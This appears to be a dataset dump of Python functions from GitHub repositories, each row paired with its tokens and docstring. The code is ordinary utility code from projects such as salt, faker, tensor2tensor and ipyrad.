repo
stringlengths
7
55
path
stringlengths
4
223
url
stringlengths
87
315
code
stringlengths
75
104k
code_tokens
list
docstring
stringlengths
1
46.9k
docstring_tokens
list
language
stringclasses
1 value
partition
stringclasses
3 values
avg_line_len
float64
7.91
980
saltstack/salt
salt/tokens/localfs.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/tokens/localfs.py#L75-L88
def rm_token(opts, tok): ''' Remove token from the store. :param opts: Salt master config options :param tok: Token to remove :returns: Empty dict if successful. None if failed. ''' t_path = os.path.join(opts['token_dir'], tok) try: os.remove(t_path) return {} except (IOError, OSError): log.warning('Could not remove token %s', tok)
[ "def", "rm_token", "(", "opts", ",", "tok", ")", ":", "t_path", "=", "os", ".", "path", ".", "join", "(", "opts", "[", "'token_dir'", "]", ",", "tok", ")", "try", ":", "os", ".", "remove", "(", "t_path", ")", "return", "{", "}", "except", "(", "IOError", ",", "OSError", ")", ":", "log", ".", "warning", "(", "'Could not remove token %s'", ",", "tok", ")" ]
Remove token from the store. :param opts: Salt master config options :param tok: Token to remove :returns: Empty dict if successful. None if failed.
[ "Remove", "token", "from", "the", "store", "." ]
python
train
27.214286
bitesofcode/projexui
projexui/widgets/xtreewidget/xtreewidgetdelegate.py
https://github.com/bitesofcode/projexui/blob/f18a73bec84df90b034ca69b9deea118dbedfc4d/projexui/widgets/xtreewidget/xtreewidgetdelegate.py#L167-L180
def drawBackground( self, painter, opt, rect, brush ): """ Make sure the background extends to 0 for the first item. :param painter | <QtGui.QPainter> rect | <QtCore.QRect> brush | <QtGui.QBrush> """ if not brush: return painter.setPen(QtCore.Qt.NoPen) painter.setBrush(brush) painter.drawRect(rect)
[ "def", "drawBackground", "(", "self", ",", "painter", ",", "opt", ",", "rect", ",", "brush", ")", ":", "if", "not", "brush", ":", "return", "painter", ".", "setPen", "(", "QtCore", ".", "Qt", ".", "NoPen", ")", "painter", ".", "setBrush", "(", "brush", ")", "painter", ".", "drawRect", "(", "rect", ")" ]
Make sure the background extends to 0 for the first item. :param painter | <QtGui.QPainter> rect | <QtCore.QRect> brush | <QtGui.QBrush>
[ "Make", "sure", "the", "background", "extends", "to", "0", "for", "the", "first", "item", ".", ":", "param", "painter", "|", "<QtGui", ".", "QPainter", ">", "rect", "|", "<QtCore", ".", "QRect", ">", "brush", "|", "<QtGui", ".", "QBrush", ">" ]
python
train
31.642857
joke2k/faker
faker/providers/__init__.py
https://github.com/joke2k/faker/blob/965824b61132e52d92d1a6ce470396dbbe01c96c/faker/providers/__init__.py#L121-L129
def random_digit_or_empty(self): """ Returns a random digit/number between 0 and 9 or an empty string. """ if self.generator.random.randint(0, 1): return self.generator.random.randint(0, 9) else: return ''
[ "def", "random_digit_or_empty", "(", "self", ")", ":", "if", "self", ".", "generator", ".", "random", ".", "randint", "(", "0", ",", "1", ")", ":", "return", "self", ".", "generator", ".", "random", ".", "randint", "(", "0", ",", "9", ")", "else", ":", "return", "''" ]
Returns a random digit/number between 0 and 9 or an empty string.
[ "Returns", "a", "random", "digit", "/", "number", "between", "0", "and", "9", "or", "an", "empty", "string", "." ]
python
train
29.888889
Kortemme-Lab/klab
klab/rosetta/input_files.py
https://github.com/Kortemme-Lab/klab/blob/6d410ad08f1bd9f7cbbb28d7d946e94fbaaa2b6b/klab/rosetta/input_files.py#L129-L169
def get_distinct_segments(self, left_offset = 0, right_offset = 0, sequence_length = None): '''Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned segments will be [(23, 40), (43, 46)]. This may not be the fastest way to calculate this (numpy?) but that is probably not an issue. The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so that all possible 9-mers are considered. ''' # Create a unique, sorted list of all loop terminus positions positions = set() for l in self.data: assert(l['start'] <= l['end']) if sequence_length: # If we know the sequence length then we can return valid positions positions = positions.union(range(max(1, l['start'] - left_offset + 1), min(sequence_length + 1, l['end'] + 1 + right_offset - 1))) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works. else: # Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully positions = positions.union(range(max(1, l['start'] - left_offset + 1), l['end'] + 1 + right_offset - 1)) # For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works. positions = sorted(positions) # Iterate through the list to define the segments segments = [] current_start = None last_position = None for p in positions: if current_start == None: current_start = p last_position = p else: if p == last_position + 1: last_position = p else: segments.append((current_start, last_position)) current_start = p last_position = p if current_start and last_position: segments.append((current_start, last_position)) return segments
[ "def", "get_distinct_segments", "(", "self", ",", "left_offset", "=", "0", ",", "right_offset", "=", "0", ",", "sequence_length", "=", "None", ")", ":", "# Create a unique, sorted list of all loop terminus positions", "positions", "=", "set", "(", ")", "for", "l", "in", "self", ".", "data", ":", "assert", "(", "l", "[", "'start'", "]", "<=", "l", "[", "'end'", "]", ")", "if", "sequence_length", ":", "# If we know the sequence length then we can return valid positions", "positions", "=", "positions", ".", "union", "(", "range", "(", "max", "(", "1", ",", "l", "[", "'start'", "]", "-", "left_offset", "+", "1", ")", ",", "min", "(", "sequence_length", "+", "1", ",", "l", "[", "'end'", "]", "+", "1", "+", "right_offset", "-", "1", ")", ")", ")", "# For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.", "else", ":", "# Otherwise, we may return positions outside the sequence length however Python splicing can handle this gracefully", "positions", "=", "positions", ".", "union", "(", "range", "(", "max", "(", "1", ",", "l", "[", "'start'", "]", "-", "left_offset", "+", "1", ")", ",", "l", "[", "'end'", "]", "+", "1", "+", "right_offset", "-", "1", ")", ")", "# For clarity, I did not simplify the expressions. The left_offset requires a +1 to be added, the right_offset requires a -1 to be added. The right offset also requires a +1 due to the way Python splicing works.", "positions", "=", "sorted", "(", "positions", ")", "# Iterate through the list to define the segments", "segments", "=", "[", "]", "current_start", "=", "None", "last_position", "=", "None", "for", "p", "in", "positions", ":", "if", "current_start", "==", "None", ":", "current_start", "=", "p", "last_position", "=", "p", "else", ":", "if", "p", "==", "last_position", "+", "1", ":", "last_position", "=", "p", "else", ":", "segments", ".", "append", "(", "(", "current_start", ",", "last_position", ")", ")", "current_start", "=", "p", "last_position", "=", "p", "if", "current_start", "and", "last_position", ":", "segments", ".", "append", "(", "(", "current_start", ",", "last_position", ")", ")", "return", "segments" ]
Returns a list of segments (pairs of start and end positions) based on the loop definitions. The returned segments merge overlapping loops e.g. if the loops file contains sections 32-40, 23-30, 28-33, and 43-46 then the returned segments will be [(23, 40), (43, 46)]. This may not be the fastest way to calculate this (numpy?) but that is probably not an issue. The offsets are used to select the residues surrounding the loop regions. For example, i.e. if a sequence segment is 7 residues long at positions 13-19 and we require 9-mers, we must consider the segment from positions 5-27 so that all possible 9-mers are considered.
[ "Returns", "a", "list", "of", "segments", "(", "pairs", "of", "start", "and", "end", "positions", ")", "based", "on", "the", "loop", "definitions", ".", "The", "returned", "segments", "merge", "overlapping", "loops", "e", ".", "g", ".", "if", "the", "loops", "file", "contains", "sections", "32", "-", "40", "23", "-", "30", "28", "-", "33", "and", "43", "-", "46", "then", "the", "returned", "segments", "will", "be", "[", "(", "23", "40", ")", "(", "43", "46", ")", "]", ".", "This", "may", "not", "be", "the", "fastest", "way", "to", "calculate", "this", "(", "numpy?", ")", "but", "that", "is", "probably", "not", "an", "issue", "." ]
python
train
63.634146
linnarsson-lab/loompy
loompy/loompy.py
https://github.com/linnarsson-lab/loompy/blob/62c8373a92b058753baa3a95331fb541f560f599/loompy/loompy.py#L531-L545
def set_edges(self, name: str, a: np.ndarray, b: np.ndarray, w: np.ndarray, *, axis: int) -> None: """ **DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead """ deprecated("'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead") try: g = scipy.sparse.coo_matrix((w, (a, b)), (self.shape[axis], self.shape[axis])) except Exception: raise ValueError("Input arrays could not be converted to a sparse matrix") if axis == 0: self.row_graphs[name] = g elif axis == 1: self.col_graphs[name] = g else: raise ValueError("axis must be 0 (rows) or 1 (columns)")
[ "def", "set_edges", "(", "self", ",", "name", ":", "str", ",", "a", ":", "np", ".", "ndarray", ",", "b", ":", "np", ".", "ndarray", ",", "w", ":", "np", ".", "ndarray", ",", "*", ",", "axis", ":", "int", ")", "->", "None", ":", "deprecated", "(", "\"'set_edges' is deprecated. Use 'ds.row_graphs[name] = g' or 'ds.col_graphs[name] = g' instead\"", ")", "try", ":", "g", "=", "scipy", ".", "sparse", ".", "coo_matrix", "(", "(", "w", ",", "(", "a", ",", "b", ")", ")", ",", "(", "self", ".", "shape", "[", "axis", "]", ",", "self", ".", "shape", "[", "axis", "]", ")", ")", "except", "Exception", ":", "raise", "ValueError", "(", "\"Input arrays could not be converted to a sparse matrix\"", ")", "if", "axis", "==", "0", ":", "self", ".", "row_graphs", "[", "name", "]", "=", "g", "elif", "axis", "==", "1", ":", "self", ".", "col_graphs", "[", "name", "]", "=", "g", "else", ":", "raise", "ValueError", "(", "\"axis must be 0 (rows) or 1 (columns)\"", ")" ]
**DEPRECATED** - Use `ds.row_graphs[name] = g` or `ds.col_graphs[name] = g` instead
[ "**", "DEPRECATED", "**", "-", "Use", "ds", ".", "row_graphs", "[", "name", "]", "=", "g", "or", "ds", ".", "col_graphs", "[", "name", "]", "=", "g", "instead" ]
python
train
42.6
splitkeycoffee/pyhottop
pyhottop/pyhottop.py
https://github.com/splitkeycoffee/pyhottop/blob/2986bbb2d848f7e41fa3ece5ebb1b33c8882219c/pyhottop/pyhottop.py#L195-L217
def _validate_checksum(self, buffer): """Validate the buffer response against the checksum. When reading the serial interface, data will come back in a raw format with an included checksum process. :returns: bool """ self._log.debug("Validating the buffer") if len(buffer) == 0: self._log.debug("Buffer was empty") if self._conn.isOpen(): self._log.debug('Closing connection') self._conn.close() return False p0 = hex2int(buffer[0]) p1 = hex2int(buffer[1]) checksum = sum([hex2int(c) for c in buffer[:35]]) & 0xFF p35 = hex2int(buffer[35]) if p0 != 165 or p1 != 150 or p35 != checksum: self._log.debug("Buffer checksum was not valid") return False return True
[ "def", "_validate_checksum", "(", "self", ",", "buffer", ")", ":", "self", ".", "_log", ".", "debug", "(", "\"Validating the buffer\"", ")", "if", "len", "(", "buffer", ")", "==", "0", ":", "self", ".", "_log", ".", "debug", "(", "\"Buffer was empty\"", ")", "if", "self", ".", "_conn", ".", "isOpen", "(", ")", ":", "self", ".", "_log", ".", "debug", "(", "'Closing connection'", ")", "self", ".", "_conn", ".", "close", "(", ")", "return", "False", "p0", "=", "hex2int", "(", "buffer", "[", "0", "]", ")", "p1", "=", "hex2int", "(", "buffer", "[", "1", "]", ")", "checksum", "=", "sum", "(", "[", "hex2int", "(", "c", ")", "for", "c", "in", "buffer", "[", ":", "35", "]", "]", ")", "&", "0xFF", "p35", "=", "hex2int", "(", "buffer", "[", "35", "]", ")", "if", "p0", "!=", "165", "or", "p1", "!=", "150", "or", "p35", "!=", "checksum", ":", "self", ".", "_log", ".", "debug", "(", "\"Buffer checksum was not valid\"", ")", "return", "False", "return", "True" ]
Validate the buffer response against the checksum. When reading the serial interface, data will come back in a raw format with an included checksum process. :returns: bool
[ "Validate", "the", "buffer", "response", "against", "the", "checksum", "." ]
python
train
36.304348
nicferrier/pyproxyfs
src/pyproxyfs/__init__.py
https://github.com/nicferrier/pyproxyfs/blob/7db09bb07bdeece56b7b1c4bf78c9f0b0a03c14b/src/pyproxyfs/__init__.py#L51-L63
def _mergedict(a, b): """Recusively merge the 2 dicts. Destructive on argument 'a'. """ for p, d1 in b.items(): if p in a: if not isinstance(d1, dict): continue _mergedict(a[p], d1) else: a[p] = d1 return a
[ "def", "_mergedict", "(", "a", ",", "b", ")", ":", "for", "p", ",", "d1", "in", "b", ".", "items", "(", ")", ":", "if", "p", "in", "a", ":", "if", "not", "isinstance", "(", "d1", ",", "dict", ")", ":", "continue", "_mergedict", "(", "a", "[", "p", "]", ",", "d1", ")", "else", ":", "a", "[", "p", "]", "=", "d1", "return", "a" ]
Recusively merge the 2 dicts. Destructive on argument 'a'.
[ "Recusively", "merge", "the", "2", "dicts", "." ]
python
test
21.769231
tensorflow/tensor2tensor
tensor2tensor/models/slicenet.py
https://github.com/tensorflow/tensor2tensor/blob/272500b6efe353aeb638d2745ed56e519462ca31/tensor2tensor/models/slicenet.py#L175-L212
def slicenet_middle(inputs_encoded, targets, target_space_emb, mask, hparams): """Middle part of slicenet, connecting encoder and decoder.""" def norm_fn(x, name): with tf.variable_scope(name, default_name="norm"): return common_layers.apply_norm(x, hparams.norm_type, hparams.hidden_size, hparams.norm_epsilon) # Flatten targets and embed target_space_id. targets_flat = tf.expand_dims(common_layers.flatten4d3d(targets), axis=2) target_space_emb = tf.tile(target_space_emb, [tf.shape(targets_flat)[0], 1, 1, 1]) # Use attention from each target to look at input and retrieve. targets_shifted = common_layers.shift_right( targets_flat, pad_value=target_space_emb) if hparams.attention_type == "none": targets_with_attention = tf.zeros_like(targets_shifted) else: inputs_padding_bias = (1.0 - mask) * -1e9 # Bias to not attend to padding. targets_with_attention = attention( targets_shifted, inputs_encoded, norm_fn, hparams, bias=inputs_padding_bias) # Positional targets: merge attention and raw. kernel = (hparams.kernel_height, hparams.kernel_width) targets_merged = common_layers.subseparable_conv_block( tf.concat([targets_with_attention, targets_shifted], axis=3), hparams.hidden_size, [((1, 1), kernel)], normalizer_fn=norm_fn, padding="LEFT", separability=4, name="targets_merge") return targets_merged, 0.0
[ "def", "slicenet_middle", "(", "inputs_encoded", ",", "targets", ",", "target_space_emb", ",", "mask", ",", "hparams", ")", ":", "def", "norm_fn", "(", "x", ",", "name", ")", ":", "with", "tf", ".", "variable_scope", "(", "name", ",", "default_name", "=", "\"norm\"", ")", ":", "return", "common_layers", ".", "apply_norm", "(", "x", ",", "hparams", ".", "norm_type", ",", "hparams", ".", "hidden_size", ",", "hparams", ".", "norm_epsilon", ")", "# Flatten targets and embed target_space_id.", "targets_flat", "=", "tf", ".", "expand_dims", "(", "common_layers", ".", "flatten4d3d", "(", "targets", ")", ",", "axis", "=", "2", ")", "target_space_emb", "=", "tf", ".", "tile", "(", "target_space_emb", ",", "[", "tf", ".", "shape", "(", "targets_flat", ")", "[", "0", "]", ",", "1", ",", "1", ",", "1", "]", ")", "# Use attention from each target to look at input and retrieve.", "targets_shifted", "=", "common_layers", ".", "shift_right", "(", "targets_flat", ",", "pad_value", "=", "target_space_emb", ")", "if", "hparams", ".", "attention_type", "==", "\"none\"", ":", "targets_with_attention", "=", "tf", ".", "zeros_like", "(", "targets_shifted", ")", "else", ":", "inputs_padding_bias", "=", "(", "1.0", "-", "mask", ")", "*", "-", "1e9", "# Bias to not attend to padding.", "targets_with_attention", "=", "attention", "(", "targets_shifted", ",", "inputs_encoded", ",", "norm_fn", ",", "hparams", ",", "bias", "=", "inputs_padding_bias", ")", "# Positional targets: merge attention and raw.", "kernel", "=", "(", "hparams", ".", "kernel_height", ",", "hparams", ".", "kernel_width", ")", "targets_merged", "=", "common_layers", ".", "subseparable_conv_block", "(", "tf", ".", "concat", "(", "[", "targets_with_attention", ",", "targets_shifted", "]", ",", "axis", "=", "3", ")", ",", "hparams", ".", "hidden_size", ",", "[", "(", "(", "1", ",", "1", ")", ",", "kernel", ")", "]", ",", "normalizer_fn", "=", "norm_fn", ",", "padding", "=", "\"LEFT\"", ",", "separability", "=", "4", ",", "name", "=", "\"targets_merge\"", ")", "return", "targets_merged", ",", "0.0" ]
Middle part of slicenet, connecting encoder and decoder.
[ "Middle", "part", "of", "slicenet", "connecting", "encoder", "and", "decoder", "." ]
python
train
39
limodou/uliweb
uliweb/lib/werkzeug/wrappers.py
https://github.com/limodou/uliweb/blob/34472f25e4bc0b954a35346672f94e84ef18b076/uliweb/lib/werkzeug/wrappers.py#L288-L310
def _get_file_stream(self, total_content_length, content_type, filename=None, content_length=None): """Called to get a stream for the file upload. This must provide a file-like class with `read()`, `readline()` and `seek()` methods that is both writeable and readable. The default implementation returns a temporary file if the total content length is higher than 500KB. Because many browsers do not provide a content length for the files only the total content length matters. :param total_content_length: the total content length of all the data in the request combined. This value is guaranteed to be there. :param content_type: the mimetype of the uploaded file. :param filename: the filename of the uploaded file. May be `None`. :param content_length: the length of this file. This value is usually not provided because webbrowsers do not provide this value. """ return default_stream_factory(total_content_length, content_type, filename, content_length)
[ "def", "_get_file_stream", "(", "self", ",", "total_content_length", ",", "content_type", ",", "filename", "=", "None", ",", "content_length", "=", "None", ")", ":", "return", "default_stream_factory", "(", "total_content_length", ",", "content_type", ",", "filename", ",", "content_length", ")" ]
Called to get a stream for the file upload. This must provide a file-like class with `read()`, `readline()` and `seek()` methods that is both writeable and readable. The default implementation returns a temporary file if the total content length is higher than 500KB. Because many browsers do not provide a content length for the files only the total content length matters. :param total_content_length: the total content length of all the data in the request combined. This value is guaranteed to be there. :param content_type: the mimetype of the uploaded file. :param filename: the filename of the uploaded file. May be `None`. :param content_length: the length of this file. This value is usually not provided because webbrowsers do not provide this value.
[ "Called", "to", "get", "a", "stream", "for", "the", "file", "upload", "." ]
python
train
54.173913
onenameio/onename-python
onename/client.py
https://github.com/onenameio/onename-python/blob/74c583282f18ad9582c6b57b826126d045321494/onename/client.py#L142-L172
def update_user(self, username, profile, owner_privkey): """ Update profile_hash on blockchain """ url = self.base_url + "/users/" + username + "/update" owner_pubkey = get_pubkey_from_privkey(owner_privkey) payload = { 'profile': profile, 'owner_pubkey': owner_pubkey } resp = self._post_request(url, payload) try: unsigned_tx = resp['unsigned_tx'] except: return resp dht_resp = write_dht_profile(profile) dht_resp = dht_resp[0] if not dht_resp['status'] == 'success': return {"error": "DHT write failed"} # sign all unsigned inputs signed_tx = sign_all_unsigned_inputs(owner_privkey, unsigned_tx) return self.broadcast_transaction(signed_tx)
[ "def", "update_user", "(", "self", ",", "username", ",", "profile", ",", "owner_privkey", ")", ":", "url", "=", "self", ".", "base_url", "+", "\"/users/\"", "+", "username", "+", "\"/update\"", "owner_pubkey", "=", "get_pubkey_from_privkey", "(", "owner_privkey", ")", "payload", "=", "{", "'profile'", ":", "profile", ",", "'owner_pubkey'", ":", "owner_pubkey", "}", "resp", "=", "self", ".", "_post_request", "(", "url", ",", "payload", ")", "try", ":", "unsigned_tx", "=", "resp", "[", "'unsigned_tx'", "]", "except", ":", "return", "resp", "dht_resp", "=", "write_dht_profile", "(", "profile", ")", "dht_resp", "=", "dht_resp", "[", "0", "]", "if", "not", "dht_resp", "[", "'status'", "]", "==", "'success'", ":", "return", "{", "\"error\"", ":", "\"DHT write failed\"", "}", "# sign all unsigned inputs", "signed_tx", "=", "sign_all_unsigned_inputs", "(", "owner_privkey", ",", "unsigned_tx", ")", "return", "self", ".", "broadcast_transaction", "(", "signed_tx", ")" ]
Update profile_hash on blockchain
[ "Update", "profile_hash", "on", "blockchain" ]
python
train
26.419355
ianepperson/pyredminews
redmine/redmine_rest.py
https://github.com/ianepperson/pyredminews/blob/b2b0581483632738a3acca3b4e093c181847b813/redmine/redmine_rest.py#L548-L555
def update(self, id, **dict): '''Update a given item with the passed data.''' if not self._item_path: raise AttributeError('update is not available for %s' % self._item_name) target = (self._update_path or self._item_path) % id payload = json.dumps({self._item_type:dict}) self._redmine.put(target, payload) return None
[ "def", "update", "(", "self", ",", "id", ",", "*", "*", "dict", ")", ":", "if", "not", "self", ".", "_item_path", ":", "raise", "AttributeError", "(", "'update is not available for %s'", "%", "self", ".", "_item_name", ")", "target", "=", "(", "self", ".", "_update_path", "or", "self", ".", "_item_path", ")", "%", "id", "payload", "=", "json", ".", "dumps", "(", "{", "self", ".", "_item_type", ":", "dict", "}", ")", "self", ".", "_redmine", ".", "put", "(", "target", ",", "payload", ")", "return", "None" ]
Update a given item with the passed data.
[ "Update", "a", "given", "item", "with", "the", "passed", "data", "." ]
python
train
46.5
SeattleTestbed/seash
pyreadline/rlmain.py
https://github.com/SeattleTestbed/seash/blob/40f9d2285662ff8b61e0468b4196acee089b273b/pyreadline/rlmain.py#L432-L441
def _bell(self): u'''ring the bell if requested.''' if self.bell_style == u'none': pass elif self.bell_style == u'visible': raise NotImplementedError(u"Bellstyle visible is not implemented yet.") elif self.bell_style == u'audible': self.console.bell() else: raise ReadlineError(u"Bellstyle %s unknown."%self.bell_style)
[ "def", "_bell", "(", "self", ")", ":", "if", "self", ".", "bell_style", "==", "u'none'", ":", "pass", "elif", "self", ".", "bell_style", "==", "u'visible'", ":", "raise", "NotImplementedError", "(", "u\"Bellstyle visible is not implemented yet.\"", ")", "elif", "self", ".", "bell_style", "==", "u'audible'", ":", "self", ".", "console", ".", "bell", "(", ")", "else", ":", "raise", "ReadlineError", "(", "u\"Bellstyle %s unknown.\"", "%", "self", ".", "bell_style", ")" ]
u'''ring the bell if requested.
[ "u", "ring", "the", "bell", "if", "requested", "." ]
python
train
39.8
JarryShaw/PyPCAPKit
src/protocols/application/httpv1.py
https://github.com/JarryShaw/PyPCAPKit/blob/c7f0da9aebc2cf210bf8f8b912f7d3cbb98ca10e/src/protocols/application/httpv1.py#L127-L184
def _read_http_header(self, header): """Read HTTP/1.* header. Structure of HTTP/1.* header [RFC 7230]: start-line :==: request-line / status-line request-line :==: method SP request-target SP HTTP-version CRLF status-line :==: HTTP-version SP status-code SP reason-phrase CRLF header-field :==: field-name ":" OWS field-value OWS """ try: startline, headerfield = header.split(b'\r\n', 1) para1, para2, para3 = re.split(rb'\s+', startline, 2) fields = headerfield.split(b'\r\n') lists = (re.split(rb'\s*:\s*', field, 1) for field in fields) except ValueError: raise ProtocolError('HTTP: invalid format', quiet=True) match1 = re.match(_RE_METHOD, para1) match2 = re.match(_RE_VERSION, para3) match3 = re.match(_RE_VERSION, para1) match4 = re.match(_RE_STATUS, para2) if match1 and match2: receipt = 'request' header = dict( request=dict( method=self.decode(para1), target=self.decode(para2), version=self.decode(match2.group('version')), ), ) elif match3 and match4: receipt = 'response' header = dict( response=dict( version=self.decode(match3.group('version')), status=int(para2), phrase=self.decode(para3), ), ) else: raise ProtocolError('HTTP: invalid format', quiet=True) try: for item in lists: key = self.decode(item[0].strip()).replace(receipt, f'{receipt}_field') value = self.decode(item[1].strip()) if key in header: if isinstance(header[key], tuple): header[key] += (value,) else: header[key] = (header[key], value) else: header[key] = value except IndexError: raise ProtocolError('HTTP: invalid format', quiet=True) return header, receipt
[ "def", "_read_http_header", "(", "self", ",", "header", ")", ":", "try", ":", "startline", ",", "headerfield", "=", "header", ".", "split", "(", "b'\\r\\n'", ",", "1", ")", "para1", ",", "para2", ",", "para3", "=", "re", ".", "split", "(", "rb'\\s+'", ",", "startline", ",", "2", ")", "fields", "=", "headerfield", ".", "split", "(", "b'\\r\\n'", ")", "lists", "=", "(", "re", ".", "split", "(", "rb'\\s*:\\s*'", ",", "field", ",", "1", ")", "for", "field", "in", "fields", ")", "except", "ValueError", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "match1", "=", "re", ".", "match", "(", "_RE_METHOD", ",", "para1", ")", "match2", "=", "re", ".", "match", "(", "_RE_VERSION", ",", "para3", ")", "match3", "=", "re", ".", "match", "(", "_RE_VERSION", ",", "para1", ")", "match4", "=", "re", ".", "match", "(", "_RE_STATUS", ",", "para2", ")", "if", "match1", "and", "match2", ":", "receipt", "=", "'request'", "header", "=", "dict", "(", "request", "=", "dict", "(", "method", "=", "self", ".", "decode", "(", "para1", ")", ",", "target", "=", "self", ".", "decode", "(", "para2", ")", ",", "version", "=", "self", ".", "decode", "(", "match2", ".", "group", "(", "'version'", ")", ")", ",", ")", ",", ")", "elif", "match3", "and", "match4", ":", "receipt", "=", "'response'", "header", "=", "dict", "(", "response", "=", "dict", "(", "version", "=", "self", ".", "decode", "(", "match3", ".", "group", "(", "'version'", ")", ")", ",", "status", "=", "int", "(", "para2", ")", ",", "phrase", "=", "self", ".", "decode", "(", "para3", ")", ",", ")", ",", ")", "else", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "try", ":", "for", "item", "in", "lists", ":", "key", "=", "self", ".", "decode", "(", "item", "[", "0", "]", ".", "strip", "(", ")", ")", ".", "replace", "(", "receipt", ",", "f'{receipt}_field'", ")", "value", "=", "self", ".", "decode", "(", "item", "[", "1", "]", ".", "strip", "(", ")", ")", "if", "key", "in", "header", ":", "if", "isinstance", "(", "header", "[", "key", "]", ",", "tuple", ")", ":", "header", "[", "key", "]", "+=", "(", "value", ",", ")", "else", ":", "header", "[", "key", "]", "=", "(", "header", "[", "key", "]", ",", "value", ")", "else", ":", "header", "[", "key", "]", "=", "value", "except", "IndexError", ":", "raise", "ProtocolError", "(", "'HTTP: invalid format'", ",", "quiet", "=", "True", ")", "return", "header", ",", "receipt" ]
Read HTTP/1.* header. Structure of HTTP/1.* header [RFC 7230]: start-line :==: request-line / status-line request-line :==: method SP request-target SP HTTP-version CRLF status-line :==: HTTP-version SP status-code SP reason-phrase CRLF header-field :==: field-name ":" OWS field-value OWS
[ "Read", "HTTP", "/", "1", ".", "*", "header", "." ]
python
train
38.224138
jason-weirather/py-seq-tools
seqtools/format/sam/bam/files.py
https://github.com/jason-weirather/py-seq-tools/blob/f642c2c73ffef2acc83656a78059a476fc734ca1/seqtools/format/sam/bam/files.py#L46-L52
def _get_block(self): """Just read a single block from your current location in _fh""" b = self._fh.read(4) # get block size bytes #print self._fh.tell() if not b: raise StopIteration block_size = struct.unpack('<i',b)[0] return self._fh.read(block_size)
[ "def", "_get_block", "(", "self", ")", ":", "b", "=", "self", ".", "_fh", ".", "read", "(", "4", ")", "# get block size bytes", "#print self._fh.tell()", "if", "not", "b", ":", "raise", "StopIteration", "block_size", "=", "struct", ".", "unpack", "(", "'<i'", ",", "b", ")", "[", "0", "]", "return", "self", ".", "_fh", ".", "read", "(", "block_size", ")" ]
Just read a single block from your current location in _fh
[ "Just", "read", "a", "single", "block", "from", "your", "current", "location", "in", "_fh" ]
python
train
38.857143
hamidfzm/Flask-HTMLmin
flask_htmlmin/__init__.py
https://github.com/hamidfzm/Flask-HTMLmin/blob/03de23347ac021da4011af36b57903a235268429/flask_htmlmin/__init__.py#L29-L50
def response_minify(self, response): """ minify response html to decrease traffic """ if response.content_type == u'text/html; charset=utf-8': endpoint = request.endpoint or '' view_func = current_app.view_functions.get(endpoint, None) name = ( '%s.%s' % (view_func.__module__, view_func.__name__) if view_func else '' ) if name in self._exempt_routes: return response response.direct_passthrough = False response.set_data( self._html_minify.minify(response.get_data(as_text=True)) ) return response return response
[ "def", "response_minify", "(", "self", ",", "response", ")", ":", "if", "response", ".", "content_type", "==", "u'text/html; charset=utf-8'", ":", "endpoint", "=", "request", ".", "endpoint", "or", "''", "view_func", "=", "current_app", ".", "view_functions", ".", "get", "(", "endpoint", ",", "None", ")", "name", "=", "(", "'%s.%s'", "%", "(", "view_func", ".", "__module__", ",", "view_func", ".", "__name__", ")", "if", "view_func", "else", "''", ")", "if", "name", "in", "self", ".", "_exempt_routes", ":", "return", "response", "response", ".", "direct_passthrough", "=", "False", "response", ".", "set_data", "(", "self", ".", "_html_minify", ".", "minify", "(", "response", ".", "get_data", "(", "as_text", "=", "True", ")", ")", ")", "return", "response", "return", "response" ]
minify response html to decrease traffic
[ "minify", "response", "html", "to", "decrease", "traffic" ]
python
train
32.227273
dereneaton/ipyrad
ipyrad/analysis/baba.py
https://github.com/dereneaton/ipyrad/blob/5eeb8a178160f45faf71bf47cec4abe998a575d1/ipyrad/analysis/baba.py#L895-L988
def _simulate(self, nreps, admix=None, Ns=500000, gen=20): """ Enter a baba.Tree object in which the 'tree' attribute (newick derived tree) has edge lengths in units of generations. You can use the 'gen' parameter to multiply branch lengths by a constant. Parameters: ----------- nreps: (int) Number of reps (loci) to simulate under the demographic scenario tree: (baba.Tree object) A baba.Tree object initialized by calling baba.Tree(*args). admix: (list) A list of admixture events to occur on the tree. Nodes must be reference by their index number, and events must occur in time intervals when edges exist. Use the .draw() function of the baba.Tree object to see node index numbers and coalescent times. Ns: (float) Fixed effective population size for all lineages (may allow to vary in the future). gen: (int) A multiplier applied to branch lengths to scale into units of generations. Example, if all edges on a tree were 1 then you might enter 50000 to multiply so that edges are 50K generations long. """ ## node ages Taus = np.array(list(set(self.verts[:, 1]))) * 1e4 * gen ## The tips samples, ordered alphanumerically ## Population IDs correspond to their indexes in pop config ntips = len(self.tree) #names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))} ## rev ladderized leaf name order (left to right on downward facing tree) names = {name: idx for idx, name in enumerate(self.tree.get_leaf_names()[::-1])} pop_config = [ ms.PopulationConfiguration(sample_size=2, initial_size=Ns) for i in range(ntips) ] ## migration matrix all zeros init migmat = np.zeros((ntips, ntips)).tolist() ## a list for storing demographic events demog = [] ## coalescent times coals = sorted(list(set(self.verts[:, 1])))[1:] for ct in xrange(len(coals)): ## check for admix event before next coalescence ## ... ## print coals[ct], nidxs, time nidxs = np.where(self.verts[:, 1] == coals[ct])[0] time = Taus[ct+1] ## add coalescence at each node for nidx in nidxs: node = self.tree.search_nodes(name=str(nidx))[0] ## get destionation (lowest child idx number), and other dest = sorted(node.get_leaves(), key=lambda x: x.idx)[0] otherchild = [i for i in node.children if not i.get_leaves_by_name(dest.name)][0] ## get source if otherchild.is_leaf(): source = otherchild else: source = sorted(otherchild.get_leaves(), 